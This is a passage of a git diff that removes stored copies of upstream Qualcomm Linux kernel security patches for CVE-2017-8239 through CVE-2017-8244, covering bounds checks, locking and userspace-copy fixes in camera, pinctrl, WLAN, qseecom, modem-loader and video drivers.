-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -542,4 +542,8 @@ struct ipa_hw_hdr_proc_ctx_add_hdr_cmd_seq {
- 	struct ipa_hw_hdr_proc_ctx_tlv end;
- };
- 
-+/* IPA HW DPS/HPS image memory sizes */
-+#define IPA_HW_DPS_IMG_MEM_SIZE_V3_0 128
-+#define IPA_HW_HPS_IMG_MEM_SIZE_V3_0 320
-+
- #endif /* _IPAHAL_I_H_ */
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c
-index 6b606ab..6a70fc0 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c
-@@ -1157,6 +1157,12 @@ static struct ipahal_reg_obj ipahal_reg_objs[IPA_HW_MAX][IPA_REG_MAX] = {
- 	[IPA_HW_v3_0][IPA_QSB_MAX_READS] = {
- 		ipareg_construct_qsb_max_reads, ipareg_parse_dummy,
- 		0x00000078, 0},
-+	[IPA_HW_v3_0][IPA_DPS_SEQUENCER_FIRST] = {
-+		ipareg_construct_dummy, ipareg_parse_dummy,
-+		0x0001e000, 0},
-+	[IPA_HW_v3_0][IPA_HPS_SEQUENCER_FIRST] = {
-+		ipareg_construct_dummy, ipareg_parse_dummy,
-+		0x0001e080, 0},
- 
- 
- 	/* IPAv3.1 */
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h
-index 98894c3..6ca16bf 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -84,6 +84,8 @@ enum ipahal_reg_name {
- 	IPA_QSB_MAX_READS,
- 	IPA_TX_CFG,
- 	IPA_IDLE_INDICATION_CFG,
-+	IPA_DPS_SEQUENCER_FIRST,
-+	IPA_HPS_SEQUENCER_FIRST,
- 	IPA_REG_MAX,
- };
- 
-diff --git a/include/linux/msm_gsi.h b/include/linux/msm_gsi.h
-index 4825fc7..18d4e72 100644
---- a/include/linux/msm_gsi.h
-+++ b/include/linux/msm_gsi.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1041,6 +1041,19 @@ int gsi_configure_regs(phys_addr_t gsi_base_addr, u32 gsi_size,
-  */
- int gsi_enable_fw(phys_addr_t gsi_base_addr, u32 gsi_size, enum gsi_ver ver);
- 
-+/**
-+ * gsi_get_inst_ram_offset_and_size - Peripheral should call this function
-+ * to get instruction RAM base address offset and size. Peripheral typically
-+ * uses this info to load GSI FW into the IRAM.
-+ *
-+ * @base_offset:[OUT] - IRAM base offset address
-+ * @size:	[OUT] - IRAM size
-+
-+ * @Return none
-+ */
-+void gsi_get_inst_ram_offset_and_size(unsigned long *base_offset,
-+		unsigned long *size);
-+
- /*
-  * Here is a typical sequence of calls
-  *
-@@ -1228,9 +1241,15 @@ static inline int gsi_configure_regs(phys_addr_t gsi_base_addr, u32 gsi_size,
- {
- 	return -GSI_STATUS_UNSUPPORTED_OP;
- }
-+
- static inline int gsi_enable_fw(phys_addr_t gsi_base_addr, u32 gsi_size)
- {
- 	return -GSI_STATUS_UNSUPPORTED_OP;
- }
-+
-+static inline void gsi_get_inst_ram_offset_and_size(unsigned long *base_offset,
-+		unsigned long *size)
-+{
-+}
- #endif
- #endif
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8239/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8239/ANY/0001.patch
deleted file mode 100644
index 74b18190..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8239/ANY/0001.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From 01db0e012f86b8ba6974e5cb9905261a552a0610 Mon Sep 17 00:00:00 2001
-From: Sureshnaidu Laveti <lsuresh@codeaurora.org>
-Date: Thu, 15 Dec 2016 02:39:35 -0800
-Subject: msm: sensor: validating the flash initialization parameters
-
-Copying the flash initialization parameters from userspace memory to
-kernel memory and in turn checking for the validity of the flash
-initialization parameters pointer sent from userspace.
-
-CRs-Fixed: 1091603
-Change-Id: I17d57016c254fb6628844a152b0e7d45c0b23b2d
-Signed-off-by: Sureshnaidu Laveti <lsuresh@codeaurora.org>
----
- .../msm/camera_v2/sensor/flash/msm_flash.c         | 38 +++++++++++++++++++++-
- 1 file changed, 37 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index ff0a0a5..71d3e61 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -491,6 +491,42 @@ static int32_t msm_flash_init(
- 	return 0;
- }
- 
-+#ifdef CONFIG_COMPAT
-+static int32_t msm_flash_init_prepare(
-+	struct msm_flash_ctrl_t *flash_ctrl,
-+	struct msm_flash_cfg_data_t *flash_data)
-+{
-+	return msm_flash_init(flash_ctrl, flash_data);
-+}
-+#else
-+static int32_t msm_flash_init_prepare(
-+	struct msm_flash_ctrl_t *flash_ctrl,
-+	struct msm_flash_cfg_data_t *flash_data)
-+{
-+	struct msm_flash_cfg_data_t flash_data_k;
-+	struct msm_flash_init_info_t flash_init_info;
-+	int32_t i = 0;
-+
-+	flash_data_k.cfg_type = flash_data->cfg_type;
-+	for (i = 0; i < MAX_LED_TRIGGERS; i++) {
-+		flash_data_k.flash_current[i] =
-+			flash_data->flash_current[i];
-+		flash_data_k.flash_duration[i] =
-+			flash_data->flash_duration[i];
-+	}
-+
-+	flash_data_k.cfg.flash_init_info = &flash_init_info;
-+	if (copy_from_user(&flash_init_info,
-+			(void *)(flash_data->cfg.flash_init_info),
-+			sizeof(struct msm_flash_init_info_t))) {
-+			pr_err("%s copy_from_user failed %d\n",
-+				__func__, __LINE__);
-+			return -EFAULT;
-+		}
-+	return msm_flash_init(flash_ctrl, &flash_data_k);
-+}
-+#endif
-+
- static int32_t msm_flash_low(
- 	struct msm_flash_ctrl_t *flash_ctrl,
- 	struct msm_flash_cfg_data_t *flash_data)
-@@ -592,7 +628,7 @@ static int32_t msm_flash_config(struct msm_flash_ctrl_t *flash_ctrl,
- 
- 	switch (flash_data->cfg_type) {
- 	case CFG_FLASH_INIT:
--		rc = msm_flash_init(flash_ctrl, flash_data);
-+		rc = msm_flash_init_prepare(flash_ctrl, flash_data);
- 		break;
- 	case CFG_FLASH_RELEASE:
- 		if (flash_ctrl->flash_state != MSM_CAMERA_FLASH_RELEASE) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8240/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8240/ANY/0001.patch
deleted file mode 100644
index d5f7e5d0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8240/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 22b8b6608174c1308208d5bc6c143f4998744547 Mon Sep 17 00:00:00 2001
-From: Patrick Daly <pdaly@codeaurora.org>
-Date: Mon, 18 May 2015 14:52:47 -0700
-Subject: pinctrl: qcom: Fix bug in iteration through functions
-
-Fix iteration beyond array bounds when looping through
-the pin functions
-
-Change-Id: I7e88eed814364062fd93daf03f24ccd4baabf125
-Signed-off-by: Patrick Daly <pdaly@codeaurora.org>
-Signed-off-by: Hanumant Singh <hanumant@codeaurora.org>
----
- drivers/pinctrl/qcom/pinctrl-msm.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/pinctrl/qcom/pinctrl-msm.c b/drivers/pinctrl/qcom/pinctrl-msm.c
-index e0f86fb..cbea28c 100644
---- a/drivers/pinctrl/qcom/pinctrl-msm.c
-+++ b/drivers/pinctrl/qcom/pinctrl-msm.c
-@@ -895,7 +895,7 @@ static void msm_pinctrl_setup_pm_reset(struct msm_pinctrl *pctrl)
- 	int i = 0;
- 	const struct msm_function *func = pctrl->soc->functions;
- 
--	for (; i <= pctrl->soc->nfunctions; i++)
-+	for (; i < pctrl->soc->nfunctions; i++)
- 		if (!strcmp(func[i].name, "ps_hold")) {
- 			pctrl->restart_nb.notifier_call = msm_ps_hold_restart;
- 			pctrl->restart_nb.priority = 128;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8241/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-8241/qcacld-2.0/0001.patch
deleted file mode 100644
index 8c4583f2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8241/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 90213394b7efb28fa511b2eaebc1343ae3b54724 Mon Sep 17 00:00:00 2001
-From: Sreelakshmi Konamki <skonam@codeaurora.org>
-Date: Wed, 21 Sep 2016 15:17:42 +0530
-Subject: qcacld-2.0: Update correct msg length in oemData_SendMBOemDataReq API
-
-In oemData_SendMBOemDataReq(), messageLen of struct 'tSirOemDataReq'
-is updated with more memory than allocated to the structure.
-
-Fix is to update messageLen with size of struct.
-
-Change-Id: Ib60fd07543f630985fe29427809d822275bbb8e0
-CRs-Fixed: 1069175
----
- CORE/SME/src/oemData/oemDataApi.c | 4 +---
- 1 file changed, 1 insertion(+), 3 deletions(-)
-
-diff --git a/CORE/SME/src/oemData/oemDataApi.c b/CORE/SME/src/oemData/oemDataApi.c
-index 3e42350..fc3f91c 100644
---- a/CORE/SME/src/oemData/oemDataApi.c
-+++ b/CORE/SME/src/oemData/oemDataApi.c
-@@ -208,7 +208,6 @@ eHalStatus oemData_SendMBOemDataReq(tpAniSirGlobal pMac, tOemDataReq *pOemDataRe
- {
-     eHalStatus status = eHAL_STATUS_SUCCESS;
-     tSirOemDataReq* pMsg;
--    tANI_U16 msgLen;
-     tCsrRoamSession *pSession;
- 
-     smsLog(pMac, LOGW, "OEM_DATA: entering Function %s", __func__);
-@@ -225,9 +224,8 @@ eHalStatus oemData_SendMBOemDataReq(tpAniSirGlobal pMac, tOemDataReq *pOemDataRe
-         return eHAL_STATUS_FAILURE;
-     }
- 
--    msgLen = (uint16_t) (sizeof(*pMsg) + pOemDataReq->data_len);
-     pMsg->messageType = pal_cpu_to_be16((tANI_U16)eWNI_SME_OEM_DATA_REQ);
--    pMsg->messageLen = pal_cpu_to_be16(msgLen);
-+    pMsg->messageLen = pal_cpu_to_be16((uint16_t) sizeof(*pMsg));
-     vos_mem_copy(pMsg->selfMacAddr, pSession->selfMacAddr, sizeof(tSirMacAddr) );
-     pMsg->data_len = pOemDataReq->data_len;
-     /* Incoming buffer ptr saved, set to null to avoid free by caller */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8242/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-8242/3.18/0001.patch
deleted file mode 100644
index 500a7e42..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8242/3.18/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 6a3b8afdf97e77c0b64005b23fa6d32025d922e5 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Mon, 27 Feb 2017 13:41:07 -0800
-Subject: qseecom: add mutex around qseecom_set_client_mem_param
-
-Add mutex around qseecom_set_client_mem_param to prevent an
-ioctl thread modifying and corrupting data which is being
-processed by another ioctl in the other thread
-
-Change-Id: I0cfb8afab4001c2913be693dfe44c761b9568893
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index f8819e4..2a4cc5b 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -6982,7 +6982,11 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			break;
- 		}
- 		pr_debug("SET_MEM_PARAM: qseecom addr = 0x%pK\n", data);
-+		mutex_lock(&app_access_lock);
-+		atomic_inc(&data->ioctl_count);
- 		ret = qseecom_set_client_mem_param(data, argp);
-+		atomic_dec(&data->ioctl_count);
-+		mutex_unlock(&app_access_lock);
- 		if (ret)
- 			pr_err("failed Qqseecom_set_mem_param request: %d\n",
- 								ret);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8242/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8242/4.4/0002.patch
deleted file mode 100644
index 6cfd583d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8242/4.4/0002.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 364643660e49ec22f657d3e624bee2c7b9738d98 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Mon, 27 Feb 2017 13:41:07 -0800
-Subject: qseecom: add mutex around qseecom_set_client_mem_param
-
-Add mutex around qseecom_set_client_mem_param to prevent an
-ioctl thread modifying and corrupting data which is being
-processed by another ioctl in the other thread
-
-Change-Id: I0cfb8afab4001c2913be693dfe44c761b9568893
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/misc/qseecom.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 134995c..8d03c36 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -7043,7 +7043,11 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			break;
- 		}
- 		pr_debug("SET_MEM_PARAM: qseecom addr = 0x%pK\n", data);
-+		mutex_lock(&app_access_lock);
-+		atomic_inc(&data->ioctl_count);
- 		ret = qseecom_set_client_mem_param(data, argp);
-+		atomic_dec(&data->ioctl_count);
-+		mutex_unlock(&app_access_lock);
- 		if (ret)
- 			pr_err("failed Qqseecom_set_mem_param request: %d\n",
- 								ret);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8243/4.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8243/4.4/0001.patch
deleted file mode 100644
index 8e874940..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8243/4.4/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From cae0d5a6f32e52e06c0841bb7142452062dc2ac8 Mon Sep 17 00:00:00 2001
-From: Kishor PK <kpbhat@codeaurora.org>
-Date: Thu, 30 Mar 2017 14:23:37 +0530
-Subject: soc: qcom: pil: Avoid possible buffer overflow during Modem boot
-
-Buffer overflow can occur if MBA firmware size exceeds 1MB.
-So validate size before copying the firmware.
-
-CRs-Fixed: 2001803
-Change-Id: I070ddf85fbc47df072e7258369272366262ebf46
-Signed-off-by: Kishor PK <kpbhat@codeaurora.org>
----
- drivers/soc/qcom/pil-msa.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/soc/qcom/pil-msa.c b/drivers/soc/qcom/pil-msa.c
-index 53bddc5..988b6e8 100644
---- a/drivers/soc/qcom/pil-msa.c
-+++ b/drivers/soc/qcom/pil-msa.c
-@@ -616,7 +616,15 @@ int pil_mss_reset_load_mba(struct pil_desc *pil)
- 
- 	/* Load the MBA image into memory */
- 	count = fw->size;
--	memcpy(mba_dp_virt, data, count);
-+	if (count <= SZ_1M) {
-+		/* Ensures memcpy is done for max 1MB fw size */
-+		memcpy(mba_dp_virt, data, count);
-+	} else {
-+		dev_err(pil->dev, "%s fw image loading into memory is failed due to fw size overflow\n",
-+			__func__);
-+		 ret = -EINVAL;
-+		 goto err_mba_data;
-+	}
- 	/* Ensure memcpy of the MBA memory is done before loading the DP */
- 	wmb();
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8244/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8244/3.10/0001.patch
deleted file mode 100644
index 2586682d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8244/3.10/0001.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From f51b0f3b9da62e96b0167a3eb3376fca39fc7baf Mon Sep 17 00:00:00 2001
-From: Abdulla Anam <abdullahanam@codeaurora.org>
-Date: Wed, 22 Mar 2017 14:00:10 +0530
-Subject: msm: vidc: Protect debug_buffer access in core_info_read with lock.
-
-Serialize core_info_read with lock so that multiple concurrent
-threads do not cause the write to overflow. Also have the bound
-check to avoid overflow in write_str function.
-
-CRs-Fixed: 2013361
-Change-Id: Ia18a4b94cafd69af1d367861f2499fc202f18e9f
-Signed-off-by: Abdulla Anam <abdullahanam@codeaurora.org>
-Signed-off-by: Sanjay Singh <sisanj@codeaurora.org>
----
- drivers/media/platform/msm/vidc/msm_v4l2_vidc.c  |  5 +++-
- drivers/media/platform/msm/vidc/msm_vidc_debug.c | 37 ++++++++++++++++++++----
- drivers/media/platform/msm/vidc/msm_vidc_debug.h |  3 +-
- 3 files changed, 37 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-index a46eda7..d845597 100644
---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -737,6 +737,8 @@ static int __init msm_vidc_init(void)
- 	if (rc) {
- 		dprintk(VIDC_ERR,
- 			"Failed to register platform driver\n");
-+		msm_vidc_debugfs_deinit_drv();
-+		debugfs_remove_recursive(vidc_driver->debugfs_root);
- 		kfree(vidc_driver);
- 		vidc_driver = NULL;
- 	}
-@@ -747,6 +749,7 @@ static int __init msm_vidc_init(void)
- static void __exit msm_vidc_exit(void)
- {
- 	platform_driver_unregister(&msm_vidc_driver);
-+	msm_vidc_debugfs_deinit_drv();
- 	debugfs_remove_recursive(vidc_driver->debugfs_root);
- 	kfree(vidc_driver);
- 	vidc_driver = NULL;
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-index 509ea440c..e66fc8b 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -28,6 +28,7 @@ int msm_vidc_sys_idle_indicator = 0x0;
- u32 msm_vidc_firmware_unload_delay = 15000;
- 
- struct debug_buffer {
-+	struct mutex lock;
- 	char ptr[MAX_DBG_BUF_SIZE];
- 	char *curr;
- 	u32 filled_size;
-@@ -54,8 +55,12 @@ static u32 write_str(struct debug_buffer *buffer, const char *fmt, ...)
- {
- 	va_list args;
- 	u32 size;
-+
-+	char *curr = buffer->curr;
-+	char *end = buffer->ptr + MAX_DBG_BUF_SIZE;
-+
- 	va_start(args, fmt);
--	size = vscnprintf(buffer->curr, MAX_DBG_BUF_SIZE - 1, fmt, args);
-+	size = vscnprintf(curr, end - curr, fmt, args);
- 	va_end(args);
- 	buffer->curr += size;
- 	buffer->filled_size += size;
-@@ -69,12 +74,15 @@ static ssize_t core_info_read(struct file *file, char __user *buf,
- 	struct hfi_device *hdev;
- 	struct hal_fw_info fw_info;
- 	int i = 0, rc = 0;
-+	ssize_t len = 0;
- 
- 	if (!core || !core->device) {
- 		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- 		return 0;
- 	}
- 	hdev = core->device;
-+
-+	mutex_lock(&dbg_buf.lock);
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
- 	write_str(&dbg_buf, "CORE %d: 0x%pK\n", core->id, core);
-@@ -98,8 +106,11 @@ err_fw_info:
- 			completion_done(&core->completions[SYS_MSG_INDEX(i)]) ?
- 			"pending" : "done");
- 	}
--	return simple_read_from_buffer(buf, count, ppos,
-+	len = simple_read_from_buffer(buf, count, ppos,
- 			dbg_buf.ptr, dbg_buf.filled_size);
-+
-+	mutex_unlock(&dbg_buf.lock);
-+	return len;
- }
- 
- static const struct file_operations core_info_fops = {
-@@ -136,7 +147,10 @@ static const struct file_operations ssr_fops = {
- 
- struct dentry *msm_vidc_debugfs_init_drv(void)
- {
--	struct dentry *dir = debugfs_create_dir("msm_vidc", NULL);
-+	struct dentry *dir = NULL;
-+
-+	mutex_init(&dbg_buf.lock);
-+	dir = debugfs_create_dir("msm_vidc", NULL);
- 	if (IS_ERR_OR_NULL(dir)) {
- 		dir = NULL;
- 		goto failed_create_dir;
-@@ -219,6 +233,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core,
- 		dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n");
- 		goto failed_create_dir;
- 	}
-+
- 	if (!debugfs_create_file("info", S_IRUGO, dir, core, &core_info_fops)) {
- 		dprintk(VIDC_ERR, "debugfs_create_file: fail\n");
- 		goto failed_create_dir;
-@@ -272,10 +287,14 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- {
- 	struct msm_vidc_inst *inst = file->private_data;
- 	int i, j;
-+	ssize_t len = 0;
-+
- 	if (!inst) {
- 		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", inst);
- 		return 0;
- 	}
-+
-+	mutex_lock(&dbg_buf.lock);
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
- 	write_str(&dbg_buf, "INSTANCE: 0x%pK (%s)\n", inst,
-@@ -332,9 +351,10 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- 	write_str(&dbg_buf, "FBD Count: %d\n", inst->count.fbd);
- 
- 	publish_unreleased_reference(inst);
--
--	return simple_read_from_buffer(buf, count, ppos,
-+	len = simple_read_from_buffer(buf, count, ppos,
- 		dbg_buf.ptr, dbg_buf.filled_size);
-+	mutex_unlock(&dbg_buf.lock);
-+	return len;
- }
- 
- static const struct file_operations inst_info_fops = {
-@@ -411,3 +431,8 @@ void msm_vidc_debugfs_update(struct msm_vidc_inst *inst,
- 	}
- }
- 
-+void msm_vidc_debugfs_deinit_drv(void)
-+{
-+	mutex_destroy(&dbg_buf.lock);
-+}
-+
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.h b/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-index bd8e3f6..e1a7ab3 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -121,6 +121,7 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst,
- 		struct dentry *parent);
- void msm_vidc_debugfs_update(struct msm_vidc_inst *inst,
- 		enum msm_vidc_debugfs_event e);
-+void msm_vidc_debugfs_deinit_drv(void);
- 
- static inline void tic(struct msm_vidc_inst *i, enum profiling_points p,
- 				 char *b)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8244/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8244/3.18/0002.patch
deleted file mode 100644
index 4c3c9154..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8244/3.18/0002.patch
+++ /dev/null
@@ -1,175 +0,0 @@
-From 01673e148223c10782b03c5485aff2a82b1900c4 Mon Sep 17 00:00:00 2001
-From: Abdulla Anam <abdullahanam@codeaurora.org>
-Date: Wed, 22 Mar 2017 14:00:10 +0530
-Subject: msm: vidc: Protect debug_buffer access in core_info_read with lock.
-
-Serialize core_info_read with lock so that multiple concurrent
-threads do not cause the write to overflow. Also have the bound
-check to avoid overflow in write_str function.
-
-CRs-Fixed: 2013361
-Change-Id: Ia18a4b94cafd69af1d367861f2499fc202f18e9f
-Signed-off-by: Abdulla Anam <abdullahanam@codeaurora.org>
----
- drivers/media/platform/msm/vidc/msm_v4l2_vidc.c  |  3 ++
- drivers/media/platform/msm/vidc/msm_vidc_debug.c | 37 ++++++++++++++++++++----
- drivers/media/platform/msm/vidc/msm_vidc_debug.h |  1 +
- 3 files changed, 35 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-index 319df5e..f77b943 100644
---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-@@ -789,6 +789,8 @@ static int __init msm_vidc_init(void)
- 	if (rc) {
- 		dprintk(VIDC_ERR,
- 			"Failed to register platform driver\n");
-+		msm_vidc_debugfs_deinit_drv();
-+		debugfs_remove_recursive(vidc_driver->debugfs_root);
- 		kfree(vidc_driver);
- 		vidc_driver = NULL;
- 	}
-@@ -799,6 +801,7 @@ static int __init msm_vidc_init(void)
- static void __exit msm_vidc_exit(void)
- {
- 	platform_driver_unregister(&msm_vidc_driver);
-+	msm_vidc_debugfs_deinit_drv();
- 	debugfs_remove_recursive(vidc_driver->debugfs_root);
- 	kfree(vidc_driver);
- 	vidc_driver = NULL;
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-index d34da57..7780990 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -34,6 +34,7 @@ int msm_vidc_debug_timeout = 0;
- #define MAX_DBG_BUF_SIZE 4096
- 
- struct debug_buffer {
-+	struct mutex lock;
- 	char ptr[MAX_DBG_BUF_SIZE];
- 	char *curr;
- 	u32 filled_size;
-@@ -60,8 +61,12 @@ static u32 write_str(struct debug_buffer *buffer, const char *fmt, ...)
- {
- 	va_list args;
- 	u32 size;
-+
-+	char *curr = buffer->curr;
-+	char *end = buffer->ptr + MAX_DBG_BUF_SIZE;
-+
- 	va_start(args, fmt);
--	size = vscnprintf(buffer->curr, MAX_DBG_BUF_SIZE - 1, fmt, args);
-+	size = vscnprintf(curr, end - curr, fmt, args);
- 	va_end(args);
- 	buffer->curr += size;
- 	buffer->filled_size += size;
-@@ -75,12 +80,15 @@ static ssize_t core_info_read(struct file *file, char __user *buf,
- 	struct hfi_device *hdev;
- 	struct hal_fw_info fw_info = { {0} };
- 	int i = 0, rc = 0;
-+	ssize_t len = 0;
- 
- 	if (!core || !core->device) {
- 		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- 		return 0;
- 	}
- 	hdev = core->device;
-+
-+	mutex_lock(&dbg_buf.lock);
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
- 	write_str(&dbg_buf, "CORE %d: %pK\n", core->id, core);
-@@ -104,8 +112,11 @@ err_fw_info:
- 			completion_done(&core->completions[SYS_MSG_INDEX(i)]) ?
- 			"pending" : "done");
- 	}
--	return simple_read_from_buffer(buf, count, ppos,
-+	len = simple_read_from_buffer(buf, count, ppos,
- 			dbg_buf.ptr, dbg_buf.filled_size);
-+
-+	mutex_unlock(&dbg_buf.lock);
-+	return len;
- }
- 
- static const struct file_operations core_info_fops = {
-@@ -143,7 +154,10 @@ static const struct file_operations ssr_fops = {
- struct dentry *msm_vidc_debugfs_init_drv(void)
- {
- 	bool ok = false;
--	struct dentry *dir = debugfs_create_dir("msm_vidc", NULL);
-+	struct dentry *dir = NULL;
-+
-+	mutex_init(&dbg_buf.lock);
-+	dir = debugfs_create_dir("msm_vidc", NULL);
- 	if (IS_ERR_OR_NULL(dir)) {
- 		dir = NULL;
- 		goto failed_create_dir;
-@@ -212,6 +226,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core,
- 		dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n");
- 		goto failed_create_dir;
- 	}
-+
- 	if (!debugfs_create_file("info", S_IRUGO, dir, core, &core_info_fops)) {
- 		dprintk(VIDC_ERR, "debugfs_create_file: fail\n");
- 		goto failed_create_dir;
-@@ -266,6 +281,7 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
